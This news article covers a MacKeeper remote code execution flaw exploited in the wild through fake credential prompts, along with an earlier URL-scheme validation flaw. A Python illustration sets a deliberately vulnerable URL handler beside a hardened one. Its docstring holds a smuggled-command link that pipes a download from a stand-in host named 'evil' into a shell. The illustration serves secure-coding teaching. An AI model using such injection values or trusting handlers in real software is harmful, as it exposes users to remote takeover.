Users of the controversial utility software MacKeeper who are not running the latest version are exposed to a serious security flaw that can trick them into handing their administrator password to attackers, leaving the Mac open to a complete remote takeover. Although the problem has been fixed in version 3.4.1 of the much-maligned "cleanup" utility, the flaw is being actively exploited in the wild by attackers preying on users who have not updated.
Earlier versions of MacKeeper contain a remote code execution (RCE) flaw that lets an attacker inject code redirecting the program to a malicious web page hosting malware known as OSX/Agent-ANTU. A single line of JavaScript on that page produces a fake malware report, styled to look as if it comes from MacKeeper, that asks for the user's administrator credentials. A genuine macOS privilege prompt is a system dialog, not a form inside a web page, which is the tell for anyone who sees such a request.
With those credentials, the attacker can install a bot that collects system details and executes commands remotely. Attacks in the wild were spotted just a few days after the initial proof of concept and documentation of the flaw were published. Because many of the company's 20 million users were enticed to download the program through "scareware" ads or other aggressive sales tactics, they may be loath to update, or may believe the program has already been removed when in fact it is exceedingly difficult to remove completely, leaving the host Mac still vulnerable to the attack.
An investigation of the software by Mac-Forums found that it did perform some of its advertised functions, but that everything beneficial the program did could also be done by built-in Mac utilities or by free third-party programs that do not rely on "scareware" tactics. The analysis concluded that while the program was not itself malicious, it was poorly executed even in its advertised functions, and that once its extortionate fear-based advertising, poor product support, and deliberately obtuse removal process were taken into account, it was a poor choice compared to the excellent free third-party or Apple-included utility apps.
This is the second serious security flaw to be found in the program in as many months; an earlier flaw was discovered last month, caused by MacKeeper ignoring an Apple guideline on input validation for custom URL schemes, the same mechanism by which tapping a phone number or a direct iTunes link launches the corresponding application. Apple cautions developers that they must validate everything that arrives in such a URL, because any web page or e-mail can carry a crafted one, and a handler that trusts the URL's contents can be driven to do whatever the attacker asks. MacKeeper's developers apparently disregarded that, leaving a vulnerability that could wreak havoc if a user so much as clicks on a malicious link.
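As an added illustration of the input-validation point, and not code from MacKeeper or from the page above, the following Python sketch contrasts a custom-URL-scheme handler that trusts the URL with one that validates it. The scheme name `examplecleaner://`, the action names, the parameter `target` and the `/usr/local/bin/cleaner` binary are all invented for the example; the structure of the check is what matters.

```python
"""Custom URL scheme handling: a trusting handler beside a validating one.

Everything named here (the examplecleaner:// scheme, the scan/show_report
actions, the target parameter, the cleaner binary) is hypothetical and
exists only for this illustration.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlparse

SCHEME = "examplecleaner"  # hypothetical scheme for this example


# ---- Vulnerable pattern ---------------------------------------------------
def vulnerable_build_command(url: str) -> str:
    """Takes the URL's 'target' value as-is and splices it into a shell line.

    A link such as
        examplecleaner://scan?target=/tmp%26%26curl%20evil%7Csh
    yields "/tmp&&curl evil|sh" after percent-decoding, so whoever can get
    the user to click the link runs commands in the user's context.
    """
    query = parse_qs(urlparse(url).query)
    target = query.get("target", [""])[0]
    return f"/usr/local/bin/cleaner scan {target}"


# ---- Hardened pattern -----------------------------------------------------
class RejectedURL(ValueError):
    """Raised for any URL the handler is not willing to act on."""


@dataclass(frozen=True)
class Request:
    action: str
    args: dict


# The only actions a URL may trigger, each with the parameters it accepts.
# Unknown actions and unexpected parameters are refused outright.
ALLOWED_ACTIONS = {
    "scan": {"target"},
    "show_report": set(),
}

# A target must be an absolute path built from plain path characters:
# no spaces, no shell metacharacters. Parent-directory traversal is
# checked separately because '.' is a legitimate path character.
SAFE_PATH = re.compile(r"^/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]*$")


def hardened_parse(url: str) -> Request:
    """Parse a URL into a validated Request or raise RejectedURL."""
    u = urlparse(url)
    if u.scheme != SCHEME:
        raise RejectedURL("wrong scheme")
    action = u.netloc  # examplecleaner://<action>?<params>
    if action not in ALLOWED_ACTIONS:
        raise RejectedURL(f"unknown action {action!r}")
    query = parse_qs(u.query, keep_blank_values=True)
    if set(query) - ALLOWED_ACTIONS[action]:
        raise RejectedURL("unexpected parameter")
    args = {}
    for key in ALLOWED_ACTIONS[action]:
        values = query.get(key, [])
        if len(values) != 1:
            raise RejectedURL(f"parameter {key!r} must appear exactly once")
        value = values[0]
        if key == "target":
            if ".." in value.split("/") or not SAFE_PATH.match(value):
                raise RejectedURL("unsafe target path")
        args[key] = value
    return Request(action, args)


def hardened_argv(req: Request) -> list:
    """Argument vector for subprocess.run(argv) with shell=False.

    Because no shell ever sees the string, a value can only ever be an
    argument, never a second command.
    """
    argv = ["/usr/local/bin/cleaner", req.action]
    for key, value in sorted(req.args.items()):
        argv += [f"--{key}", value]
    return argv


def accepts(url: str) -> bool:
    """True if the hardened handler would act on the URL."""
    try:
        hardened_parse(url)
    except RejectedURL:
        return False
    return True
```

The important properties are the ones MacKeeper's handler lacked: the scheme and action are matched against a fixed allowlist, every parameter is checked against a strict pattern, and the resulting command is built as an argument vector rather than a string handed to a shell.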
Instructions on how to fully remove MacKeeper can be found here.
MacNN recommends that users avoid this and future issues by uninstalling the program completely. Readers may occasionally see ads for the product on MacNN, owing to our keyword-based advertising system and the distributor's aggressive ad buying, but it is emphatically not endorsed by the editorial staff of MacNN, who are independent of the advertising aggregators we use to support the site.